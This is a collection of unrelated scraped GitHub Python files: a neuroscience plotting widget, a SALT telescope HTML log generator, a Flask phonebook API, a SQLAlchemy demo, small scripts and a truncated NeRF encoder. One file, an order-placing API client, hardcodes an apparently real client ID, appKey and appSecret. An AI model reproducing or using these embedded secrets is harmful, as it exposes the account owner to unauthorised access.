self.ax.set_yticklabels(confusion_matrix.index, fontsize=12)\n self.ax.set_xticklabels(confusion_matrix.columns, fontsize=12)\n else:\n self.ax.set_xticklabels(np.append([\"\"] * N2, \"FN\"), fontsize=10)\n self.ax.set_yticklabels(np.append([\"\"] * N1, \"FP\"), fontsize=10)\n\n self.ax.set_xlabel(comp.name_list[1], fontsize=20)\n self.ax.set_ylabel(comp.name_list[0], fontsize=20)\n\n self.ax.set_xlim(-0.5, N2 + 0.5)\n self.ax.set_ylim(\n N1 + 0.5,\n -0.5,\n )\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/widgets/confusion_matrix.py","file_name":"confusion_matrix.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"86738029517","text":"from pyraf import iraf\nimport saltio, saltprint, salttime\nimport os, glob, string\n\n# -----------------------------------------------------------\n# core routine\n\ndef salthtml(propcode,scamobslog,rssobslog, hrsobslog, htmlpath,nightlog,readme,clobber,logfile,verbose):\n\n# set up\n \n filenames = []\n proposers = []\n propids = []\n instrumes = []\n objects = []\n ras = []\n decs = []\n detmodes = []\n ccdtypes = []\n ccdsums = []\n gainsets = []\n rospeeds = []\n filters = []\n gratings = []\n gr_angles = []\n ar_angles = []\n time_obss = []\n date_obss = []\n exptimes = []\n hours = []\n filename = {}\n proposer = {}\n propid = {}\n instrume = {}\n object = {}\n ra = {}\n dec = {}\n detmode = {}\n ccdsum = {}\n ccdtype = {}\n gainset = {}\n rospeed = {}\n filter = {}\n grating = {}\n gr_angle = {}\n ar_angle = {}\n time_obs = {}\n exptime = {}\n status=0\n\n# test the logfile\n\n logfile = saltio.logname(logfile)\n\n# log the call\n\n saltprint.line(logfile,verbose)\n history = 'SALTHTML -- '\n history += 'scamobslog='+scamobslog+' '\n history += 'rssobslog='+rssobslog+' '\n history += 'htmlpath='+htmlpath+' '\n history += 'nightlog='+nightlog+' '\n history += 'readme='+readme+' '\n yn = 'n'\n if (clobber): yn = 'y'\n history += 'clobber='+yn+' '\n history += 'logfile='+logfile+' '\n yn = 'n'\n if (verbose): yn = 'y'\n history += 'verbose='+yn\n saltprint.log(logfile,history,verbose)\n\n# start time\n\n saltprint.time('\\nSALTHTML -- started at',logfile,verbose)\n saltprint.log(logfile,' ',verbose)\n\n# are the arguments defined\n\n if (status == 0): pids,status = saltio.argunpack('propcode',propcode ,logfile)\n if (status == 0): status = saltio.argdefined('scamobslog',scamobslog,logfile)\n if (status == 0): status = saltio.argdefined('rssobslog',rssobslog,logfile)\n if (status == 0): status = saltio.argdefined('htmlpath',htmlpath,logfile)\n\n\n\n# check htmlpath exists, ends with a \"/\" and convert to absolute path\n\n if (status == 0): htmlpath, status = saltio.abspath(htmlpath,logfile)\n\n# check observation log files exist\n\n if (status == 0 and scamobslog.upper() != 'NONE'): status = saltio.fileexists(scamobslog,logfile)\n if (status == 0 and rssobslog.upper() != 'NONE'): status = saltio.fileexists(rssobslog,logfile)\n\n# read observation logs\n\n for obslog in [scamobslog, rssobslog, hrsobslog]:\n if (status == 0 and obslog.upper() != 'NONE'): struct,status = saltio.openfits(obslog,logfile)\n if (status == 0 and obslog.upper() != 'NONE'): obstab,status = saltio.readtab(struct[1],obslog,logfile)\n if (status == 0 and obslog.upper() != 'NONE'): status = saltio.closefits(struct,logfile)\n if (status == 0 and obslog.upper() != 'NONE'):\n filenames.extend(obstab.field('filename'))\n objects.extend(obstab.field('object'))\n ras.extend(obstab.field('ra'))\n decs.extend(obstab.field('dec'))\n instrumes.extend(obstab.field('instrume'))\n proposers.extend(obstab.field('proposer'))\n propids.extend(obstab.field('propid'))\n ccdtypes.extend(obstab.field('ccdtype'))\n ccdsums.extend(obstab.field('ccdsum'))\n gainsets.extend(obstab.field('gainset'))\n rospeeds.extend(obstab.field('rospeed'))\n detmodes.extend(obstab.field('detmode'))\n filters.extend(obstab.field('filter'))\n time_obss.extend(obstab.field('time-obs'))\n date_obss.extend(obstab.field('date-obs'))\n exptimes.extend(obstab.field('exptime'))\n if (obslog == rssobslog):\n gratings.extend(obstab.field('grating'))\n gr_angles.extend(obstab.field('gr-angle'))\n ar_angles.extend(obstab.field('ar-angle'))\n else:\n for i in range(len(filenames)):\n gratings.append(' ')\n gr_angles.append(0.)\n ar_angles.append(0.)\n\n\n# Create the list of proposals\n\n if (status == 0): pids,status=saltio.cleanpropcode(pids, propids, logfile)\n\n\n# date of observations\n \n date, caldate = salttime.date_obs2yyyymmdd(date_obss[0])\n\n# sort into chronological order\n\n for i in range(len(filenames)):\n hours.append(salttime.time_obs2hr(time_obss[i]))\n if (hours[i] < 12.): hours[i] += 24\n filename[str(hours[i])] = filenames[i]\n object[str(hours[i])] = objects[i]\n ra[str(hours[i])] = ras[i]\n dec[str(hours[i])] = decs[i]\n instrume[str(hours[i])] = instrumes[i]\n proposer[str(hours[i])] = proposers[i]\n propid[str(hours[i])] = propids[i]\n ccdsum[str(hours[i])] = ccdsums[i].replace(' ','x')\n ccdtype[str(hours[i])] = ccdtypes[i]\n gainset[str(hours[i])] = gainsets[i]\n rospeed[str(hours[i])] = rospeeds[i]\n detmode[str(hours[i])] = detmodes[i]\n filter[str(hours[i])] = filters[i]\n time_obs[str(hours[i])] = time_obss[i]\n grating[str(hours[i])] = gratings[i]\n gr_angle[str(hours[i])] = gr_angles[i]\n ar_angle[str(hours[i])] = ar_angles[i]\n exptime[str(hours[i])] = exptimes[i]\n if (instrume[str(hours[i])] == 'SALTICAM'): instrume[str(hours[i])] = 'SCM'\n if ('Video Mode' in detmode[str(hours[i])]): detmode[str(hours[i])] = 'VI'\n if ('Slot Mode' in detmode[str(hours[i])]): detmode[str(hours[i])] = 'SL'\n if ('Frame Transfer' in detmode[str(hours[i])]): detmode[str(hours[i])] = 'FT'\n if ('Normal' in detmode[str(hours[i])]): detmode[str(hours[i])] = 'IM'\n if ('Bright' in gainset[str(hours[i])]): gainset[str(hours[i])] = 'BR'\n if ('Faint' in gainset[str(hours[i])]): gainset[str(hours[i])] = 'FA'\n if ('Fast' in rospeed[str(hours[i])]): rospeed[str(hours[i])] = 'FA'\n if ('Slow' in rospeed[str(hours[i])]): rospeed[str(hours[i])] = 'SL'\n if ('OBJECT' not in ccdtype[str(hours[i])].upper() and\n 'UNKNOWN' in proposer[str(hours[i])].upper()):\n proposer[str(hours[i])] = ''\n hours.sort()\n\n# create HTML directory in datapath and define html files\n\n docpath = htmlpath + 'doc/'\n if (status == 0 and not os.path.exists(docpath)): status = saltio.createdir(docpath,False,logfile)\n\n htmlfile = docpath + 'ObservationSequence' + date +'.html'\n notefile = docpath + 'CapeTownNotes' + date + '.html'\n nlogfile = docpath + 'AstronomersLog' + date + '.html'\n plogfile = docpath + 'PipelineLog' + date + '.html'\n elogfile = docpath + 'EnvironmentLog' + date + '.html'\n dlogfile = docpath + 'InstrumentDiagnostics' + date + '.html'\n\n# Copy css and banner images to the doc directory\n if (status == 0):\n status=saltio.copy(iraf.osfn('pipetools$html/style.css'),docpath,False,logfile)\n status=saltio.copy(iraf.osfn('pipetools$html/style_home.css'),docpath,False,logfile)\n status=saltio.copy(iraf.osfn('pipetools$html/header_salt.jpg'),docpath,False,logfile)\n\n\n# write observation log html file\n\n if (status == 0):\n status = writeobslog(htmlfile,filename,object,ra,dec,instrume,detmode,filter,ccdsum,\n gainset,rospeed,grating,gr_angle,ar_angle,exptime,time_obs,proposer,\n propid,hours,date,caldate,clobber,logfile,verbose,status)\n\n# write readme html file\n\n if (status == 0):\n status = writecapetownnotes(notefile,readme,date,caldate,clobber,logfile,verbose,status)\n\n# write nightlog html file\n\n if (status == 0):\n status = writenightlog(nlogfile,nightlog,date,caldate,clobber,logfile,verbose,status)\n\n# write pipeline log html file\n\n if (status == 0):\n status = writepipelog(plogfile,date,caldate,clobber,logfile,verbose,status)\n\n# write environment log html file\n\n if (status == 0):\n status = writeenvlog(elogfile,date,caldate,clobber,logfile,verbose,status)\n\n# write instrument diagnostics html file\n\n if (status == 0):\n status = writediaglog(dlogfile,date,caldate,clobber,logfile,verbose,status)\n\n# copy html files to PI directories\n\n if (status == 0):\n saltprint.log(logfile,' ',verbose)\n for pids in set(propids):\n for pid in pids.split(','):\n pid = pid.strip().upper()\n pidpath = htmlpath + pid\n if (os.path.exists(pidpath)):\n if (os.path.exists(pidpath+'/doc')):\n for file in glob.glob(pidpath+'/doc/*'):\n status = saltio.delete(file,False,logfile)\n status = saltio.deletedir(pidpath+'/doc',logfile)\n status = saltio.copydir(docpath,pidpath+'/doc',verbose,logfile)\n if (status == 0):\n infile, status = saltio.openascii(pidpath+'/doc/CapeTownNotes'+date+'.html','r',logfile)\n if (status == 0): saltio.delete(pidpath+'/doc/CapeTownNotes'+date+'.html',False,logfile)\n if (status == 0):\n outfile, status = saltio.openascii(pidpath+'/doc/CapeTownNotes'+date+'.html','w',logfile)\n if (status == 0):\n for line in infile:\n #line = line.replace('SALT user','Dr ' + string.capwords(pi.lower()))\n #line = line.replace('yourname',pi)\n line = line.replace('yyyymmdd',date)\n outfile.write(line)\n status = saltio.closeascii(outfile,logfile)\n\n# end time\n\n if (status == 0):\n saltprint.time('\\nSALTHTML -- completed at',logfile,verbose)\n else:\n saltprint.time('\\nSALTHTML -- aborted at',logfile,verbose)\n\n# -----------------------------------------------------------\n# write html header\n\ndef htmlheader(file,date,caldate,title,fontsize,logfile):\n\n# write html header\n\n status = 0\n\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\"\" + title + date + \"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\"
    \\n\")\n file.write(\" \\\"SALT\\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\" \\n\")\n file.write(\"\\n\\n\")\n file.write(\"\\n\")\n file.write(\"
    \\n\")\n    file.write(\"\\n\")\n\n    return status\n\n# -----------------------------------------------------------\n# write html footer\n\ndef htmlfooter(file,logfile):\n\n    file.write(\"\\n
    \\n\")\n file.write(\"\\n
    \\n\\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\" © SAAO 2007\\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n status = saltio.closeascii(file,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# write html template\n\ndef templatehtml(file,templatefile,logfile):\n\n line = ' '\n status = saltio.fileexists(templatefile,logfile)\n if (status == 0): infile, status = saltio.openascii(templatefile,'r',logfile)\n while line:\n line = infile.readline()\n file.write(line)\n\n return status\n\n# -----------------------------------------------------------\n# write observation log page\n\ndef writeobslog(htmlfile,filename,object,ra,dec,instrume,detmode,filter,\n ccdsum,gainset,rospeed,grating,gr_angle,ar_angle,exptime,\n time_obs,proposer,propid,hours,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite observation log html file\n\n if (status == 0 and os.path.isfile(htmlfile) and clobber):\n status = saltio.delete(htmlfile,False,logfile)\n elif (status == 0 and os.path.isfile(htmlfile) and not clobber):\n message = 'ERROR: SALTHTML -- file ' + htmlfile + ' exists. Use clobber=y'\n status = saltprint.err(logfile,message)\n\n# open observation log html file\n\n if (status == 0):\n line = ' '\n saltprint.log(logfile,'SALTHTML -- creating ObservationSequence' + date + '.html',verbose)\n outfile, status = saltio.openascii(htmlfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'ObservationLog',-1,logfile)\n\n# write table headings\n\n if (status == 0):\n outfile.write(\"%14s %12s %10s %9s %3s %2s %7s %3s %2s %2s %6s %5s %6s %6s %8s %15s %16s \\n\" %\n ('file'.ljust(14),\n 'object'.ljust(12),\n 'ra2000'.rjust(10),\n 'dec2000'.rjust(9),\n 'ins'.ljust(3),\n 'md'.ljust(2),\n 'filter'.rjust(7),\n 'bin'.rjust(3),\n 'gn'.rjust(2),\n 'sp'.rjust(2),\n 'grat'.rjust(6),\n 'gr-ang'.ljust(6),\n 'ar-ang'.ljust(6),\n 'exp'.rjust(6),\n 'UT'.rjust(8),\n 'Code'.ljust(15),\n 'PI'.ljust(16)))\n for i in range(140):\n outfile.write('-')\n outfile.write('\\n')\n\n# write table\n\n for i in hours:\n outfile.write(\"%15s %12s %10s %9s %3s %2s %7s %3s %2s %2s %6s %5.2f %6.2f %6.1f %8s %15s %16s\\n\" %\n (filename[str(i)].replace('.fits','')[:13].ljust(13),\n object[str(i)][:12].ljust(12),\n ra[str(i)][:10].ljust(10),\n dec[str(i)][:9].ljust(9),\n instrume[str(i)][:3].ljust(3),\n detmode[str(i)][:2].ljust(2),\n filter[str(i)][:7].rjust(7),\n ccdsum[str(i)][:3].rjust(3),\n gainset[str(i)][:2].rjust(2),\n rospeed[str(i)][:2].rjust(2),\n grating[str(i)][:6].ljust(6),\n gr_angle[str(i)],\n ar_angle[str(i)],\n exptime[str(i)],\n time_obs[str(i)][:8].ljust(8),\n propid[str(i)][:15].ljust(15),\n proposer[str(i)][:16].ljust(16)))\n\n# write html foolter\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Cape Town Note web page\n\ndef writecapetownnotes(notefile,readme,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old observation log html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(notefile,clobber,logfile)\n\n# open observation log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating CapeTownNotes' + date + '.html',verbose)\n outfile, status = saltio.openascii(notefile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'CapeTownNotes',0,logfile)\n\n# readme file exists?\n\n if (status == 0):\n if (not os.path.isfile(readme)):\n status=1\n message = 'ERRROR: SALTHTML -- readme file does not exist'\n else:\n\n# open nightlog file\n\n if (status == 0): infile, status = saltio.openascii(readme,'r',logfile)\n\n# append night log to html file\n\n if (status == 0):\n while line:\n line = infile.readline()\n outfile.write(line)\n\n# append readme to html file\n\n if (status == 0):\n while line:\n line = infile.readline()\n outfile.write(line)\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Night Log web page\n\ndef writenightlog(nlogfile,nightlog,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old observation log html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(nlogfile,clobber,logfile)\n\n# open observation log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating AstronomersLog' + date + '.html',verbose)\n outfile, status = saltio.openascii(nlogfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'AstronomersLog',0,logfile)\n\n# nightlog file exists?\n\n if (status == 0):\n if (not os.path.isfile(nightlog)):\n message = 'WARNING: SALTHTML -- night log does not exist'\n else:\n\n# open nightlog file\n\n if (status == 0): infile, status = saltio.openascii(nightlog,'r',logfile)\n\n# append night log to html file\n\n if (status == 0):\n while line:\n line = infile.readline()\n outfile.write(line)\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n# close htmlfile\n\n if (status == 0): status = saltio.closeascii(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Pipeline Log web page\n\ndef writepipelog(plogfile,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old pipeline log html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(plogfile,clobber,logfile)\n\n# open pipeline log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating PipelineLog' + date + '.html',verbose)\n outfile, status = saltio.openascii(plogfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'PipelineLog',0,logfile)\n\n# nightlog file exists?\n\n if (status == 0):\n if (not os.path.isfile(logfile)):\n message = 'WARNING: SALTHTML -- pipeline log does not exist'\n else:\n\n# open nightlog file\n\n if (status == 0): infile, status = saltio.openascii(logfile,'r',logfile)\n\n# append night log to html file\n\n if (status == 0):\n while line:\n line = infile.readline()\n outfile.write(line)\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n# close htmlfile\n\n if (status == 0): status = saltio.closeascii(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Environment Log web page\n\ndef writeenvlog(elogfile,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old environemnt log html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(elogfile,clobber,logfile)\n\n# open environment log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating EnvironmentLog' + date + '.html',verbose)\n outfile, status = saltio.openascii(elogfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'EnvironmentLog',0,logfile)\n\n# content pending\n\n outfile.write('Content pending\\n')\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n# close htmlfile\n\n if (status == 0): status = saltio.closeascii(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Instrument Diagnostic web page\n\ndef writediaglog(dlogfile,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old diagnostic html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(dlogfile,clobber,logfile)\n\n# open diagnostic log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating InstrumentDiagnostics' + date + '.html',verbose)\n outfile, status = saltio.openascii(dlogfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'InstrumentDiagnostics',0,logfile)\n\n# content pending\n\n outfile.write('Content pending\\n')\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n# close htmlfile\n\n if (status == 0): status = saltio.closeascii(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# main code\n\nif not iraf.deftask('salthtml'):\n parfile = iraf.osfn(\"pipetools$salthtml.par\")\n t = iraf.IrafTaskFactory(taskname=\"salthtml\",value=parfile,function=salthtml, pkgname='pipetools')\n","repo_name":"saltastro/pipetools","sub_path":"salthtml.py","file_name":"salthtml.py","file_ext":"py","file_size_in_byte":23042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8111725916","text":"# Counts how many questions already have an answer\n# Option -s shows questions with no answers\n\nimport json\nimport sys\n\n\ndef get_count(show_no_answer):\n\tf = open(\"data/progr_tehn_2023_CPKE.json\")\n\tdata = json.load(f)\n\n\tanswers = 0\n\tquestions = 0\n\n\tfor i in data:\n\t\tquestions += 1\n\t\tif i[\"correct\"] != None:\n\t\t\tanswers += 1\n\t\telif show_no_answer:\n\t\t\tprint(\"{} {}\".format(i[\"id\"], i[\"question\"]))\n\n\tprint(\"{} / {}\".format(answers, questions))\n\n\tf.close()\n\nif __name__ == '__main__':\n\tget_count('-s' in sys.argv)","repo_name":"klappscheinwerfer/CET","sub_path":"tools/get-count.py","file_name":"get-count.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26367117765","text":"import requests, time\nfrom equities_test.public_method.get_MD5 import get_md5\nfrom equities_test.public_method.get_AES import aesEncrypt\nfrom equities_test.apis.create_code import get_code\nfrom equities_test.apis.get_order_token import get_token\n\n\ndef set_order(phone, productCode, host):\n thirdOrderCode = get_code()\n orderMobile = aesEncrypt(f'{phone}')\n orderPersonName = aesEncrypt('test_order')\n accessToken = get_token(host)\n url = f\"{host}/blade-rayo-platform-rights/rayo-platform-public-api/set-rights-order\"\n payload = f\"\"\"{{\"accessToken\":\"{accessToken}\",\"productCode\":\"{productCode}\",\"quantity\":1,\"thirdOrderCode\":\"{thirdOrderCode}\",\"orderMobile\":\"{orderMobile}\",\"orderPersonName\":\"{orderPersonName}\"}}\"\"\"\n timeStamp = str(int(time.time()*1000))\n msg = \"AC2022060000000017:SmCVbpHQTX9ZrUaYg6P3fZ3g0rJSp6JbSAhawQX4:\"+payload+\":\"+timeStamp+\":Nqr40NTRXgssYPo4NFLqbIbmDzxRq3QkG8CVhnJ3vlDeEsqPrCCltKjN39nVww4z4IE7EpoPZBJw5d0clA\"\n sign = get_md5(msg)\n headers = {\n 'Authorization': 'AC2022060000000017',\n 'clientId': 'AC2022060000000017',\n 'appKey': 'SmCVbpHQTX9ZrUaYg6P3fZ3g0rJSp6JbSAhawQX4',\n 'timeStamp': timeStamp,\n 'appSecret': 'Nqr40NTRXgssYPo4NFLqbIbmDzxRq3QkG8CVhnJ3vlDeEsqPrCCltKjN39nVww4z4IE7EpoPZBJw5d0clA',\n 'Content-Type': 'application/json',\n 'sign': sign\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n if response.status_code == 200:\n if response.json()['status'] == 1:\n # print(response.json())\n print(\"下单\" + response.json()['message'])\n else:\n print(\"下单\" + response.json()['message'])\n else:\n print(response.json()['msg'])\n try:\n return response.json()['data']['rightsOrderCode'] # PTU20230410172442726566500\n except:\n return response.json()\n\n\nif __name__ == '__main__':\n print(set_order(13763910426, 'P2303000000000009', \"https://5r5152q357.goho.co/right/api\"))\n # set_order(input('请输入手机号:'),input('请输入要下单的产品编号:'))","repo_name":"zhonghui-wu/equities_test","sub_path":"apis/set_order.py","file_name":"set_order.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33554539420","text":"import sys\nimport random\n\ndef word_game(x1,x2,x3):\n L= [x1,x2,x3]\n word= random.choice(L)\n L.remove(word)\n if len(x1)== len(x2) or len(x1) == len(x2) or len(x2)== len(x3):\n\n sys.stderr.write(\"Arguments should be a different length\\n\")\n sys.stderr.flush()\n\n\n else :\n\n if len(word)>len(L[0]) and len(word)>len(L[1]) :\n\n print(\" Guess a longest word: {}\".format(word))\n print(\"You found the longest word.Congratulations you won 50 pts\")\n\n elif len(L[0])>len(word) and len(word)>len(L[1]):\n\n print(\"Guess a longest word:{}\".format(word))\n print(\"You found a word from list.\")\n print(\"You won 30 pts\")\n\n elif len(L[0])>len(word) and len(L[1])>len(word) :\n\n print(\"Guess a longest word:{}\".format(word))\n print(\"You found a shortest word from list.\")\n print(\"You won 10 pts\")\n return word\n\n\nif len(sys.argv)== 4:\n print(word_game(sys.argv[1],sys.argv[2],sys.argv[3]))\n\nelse :\n sys.stderr.write(\"Please enter 3 words.\")\n sys.stderr.flush()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"b021527434/Assignment2-b21527434","sub_path":"Assignment2.py","file_name":"Assignment2.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17768390129","text":"from flask import Flask, render_template, request, redirect\nfrom flask_restx import Resource, Api, fields\nfrom database.models import db, Contact\nimport settings\nfrom datetime import datetime, date\nimport api.parsers as parsers\n\napp = Flask(__name__)\napi = Api(app, title='Phonebook API', description='A RESTful Web API for my Phonebook Android app', prefix='/api', doc='/api/')\nns = api.namespace('Contact', description='Operations related to contacts')\n\n# configure database\napp.config['SQLALCHEMY_DATABASE_URI'] = settings.SQLALCHEMY_DATABASE_URI\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = settings.SQLALCHEMY_TRACK_MODIFICATIONS\ndb.init_app(app)\n\n# models\ncontact_model = api.model('Contact', {\n 'id': fields.Integer(readonly=True, description=\"The contact's unique identifier\"),\n 'name': fields.String(required=True, min_length=1, description=\"The contact's name\"),\n 'email': fields.String(description=\"The contact's email address\"),\n 'phone': fields.String(description=\"The contact's phone number\"),\n 'dob': fields.Date(description=\"The contact's date of birth\")\n})\n\ndef marshal(contact):\n return api.marshal(contact, contact_model)\n\n@app.route('/')\ndef home():\n return redirect('/api/')\n\n@app.route('/test')\ndef test():\n contacts = Contact.query.all()\n return render_template('test.html', contacts=contacts)\n\n@ns.route('/')\nclass ContactApi(Resource):\n @api.marshal_list_with(contact_model)\n @api.expect(parsers.date_range)\n def get(self):\n \"\"\"\n Returns list of phonebook contacts.\n \"\"\"\n args = parsers.date_range.parse_args(request)\n query = Contact.query\n\n timestamp = args['from']\n if timestamp:\n dt = datetime.fromtimestamp(timestamp)\n query = query.filter(Contact.updated_at > dt)\n \n timestamp = args['to']\n if timestamp:\n dt = datetime.fromtimestamp(timestamp)\n query = query.filter(Contact.updated_at < dt)\n\n return query.all()\n \n @api.response(201, 'Contact successfully created', contact_model)\n @api.response(400, 'Contact name cannot be empty')\n @api.expect(contact_model)\n def post(self):\n \"\"\"\n Creates a new phonebook contact.\n \"\"\"\n args = parsers.new_contact.parse_args(request)\n if not args['name']:\n return {'errors': {'name': 'Non-empty string required'}}, 400\n contact = Contact(**args)\n db.session.add(contact)\n db.session.commit()\n return marshal(contact), 201\n\n@ns.route('/')\n@api.response(404, 'Contact not found')\nclass SingleContactApi(Resource):\n @api.response(200, 'Success.', contact_model)\n def get(self, id):\n \"\"\"\n Returns a phonebook contact.\n \"\"\"\n contact = Contact.query.get(id)\n if not contact:\n return {'errors': {'id': 'No contact with this id'}}, 404\n return marshal(contact)\n\n @api.response(204, 'Contact successfully updated') \n @api.response(400, 'Request contains an error')\n @api.expect(contact_model)\n def put(self, id):\n \"\"\"\n Updates a phonebook contact.\n \"\"\"\n args = parsers.existing_contact.parse_args(request)\n if args['id'] != id:\n return {'errors': {'id': 'Does not match path id'}}, 400\n if not args['name']:\n return {'errors': {'name': 'Non-empty string required'}}, 400\n contact = Contact.query.get(id)\n if not contact:\n return {'errors': {'id': 'No contact with this id'}}, 404\n contact.name = args['name']\n contact.email = args['email']\n contact.phone = args['phone']\n contact.dob = args['dob']\n db.session.commit()\n return None, 204\n\n @api.response(200, 'Contact successfully deleted', contact_model)\n def delete(self, id):\n \"\"\"\n Deletes a phonebook contact.\n \"\"\"\n contact = Contact.query.get(id)\n if not contact:\n return {'errors': {'id': 'No contact with this id'}}, 404\n db.session.delete(contact)\n db.session.commit()\n return marshal(contact), 200\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"achen22/phonebook-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"964498128","text":"from sqlalchemy import create_engine, Column, Integer, String, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.ext.declarative import declarative_base\n\n# создание базы данных в памяти\nengine = create_engine('sqlite:///:memory:', echo=True)\n\nBase = declarative_base()\n\n# определение модели Читатель\nclass Reader(Base):\n __tablename__ = 'reader'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n books = relationship('Book')\n\n# определение модели Книга\nclass Book(Base):\n __tablename__ = 'book'\n\n id = Column(Integer, primary_key=True)\n title = Column(String)\n author = Column(String)\n reader_id = Column(Integer, ForeignKey('reader.id'))\n\n# создание таблиц\nBase.metadata.create_all(engine)\n\n# создание сессии для работы с базой данных\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n# добавление данных в таблицы\nreader1 = Reader(name='Анна')\nreader2 = Reader(name='Иван')\n\nbook1 = Book(title='Мастер и Маргарита', author='Михаил Булгаков', reader_id=reader1.id)\nbook2 = Book(title='Преступление и наказание', author='Федор Достоевский', reader_id=reader1.id)\nbook3 = Book(title='Братья Карамазовы', author='Федор Достоевский', reader_id=reader2.id)\n\nsession.add_all([reader1, reader2, book1, book2, book3])\nsession.commit()\n\n\n# функция для вывода всех книг для введенного с клавиатуры читателя\ndef get_books_by_reader_id(reader_id):\n reader = session.query(Reader).filter_by(id=reader_id).first()\n if reader is None:\n print(f'Читатель с id={reader_id} не найден')\n else:\n books = reader.books\n for book in books:\n print(f'\"{book.title}\" by {book.author}')\n\nget_books_by_reader_id(1) # вывод всех книг для читателя с id=1\n# \"Мастер и Маргарита\" by Михаил Булгаков\n# \"Преступление и наказание\" by Федор Достоевский\n","repo_name":"chipolitta/python","sub_path":"BDrelationship/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70776199209","text":"import torch\nimport torch.nn as nn\n\nclass PositionalEncoder(nn.Module):\n \"\"\"\n This torch Module define the positional encoding strategy as described in the NeRF official paper\n \"\"\"\n def __init__(self,L):\n super(PositionalEncoder, self).__init__()\n self.L = L\n self.freqs = torch.linspace(2**0,2**(L-1),L)\n self.encoding_functions = []\n\n for freq in self.freqs:\n self.encoding_functions.append(lambda x: torch.cos(freq*torch.pi*x))\n self.encoding_functions.append(lambda x: torch.sin(freq*torch.pi*x))\n\n def forward(self,x):\n #Apply positional encoding to the input x -> [cos(2**0*pi*x),sin(2**0*pi*x),...,cos(2**(L-1)*pi*x),sin(2**(L-1)*pi*x)]\n return torch.cat([encoding_function(x) for encoding_function in 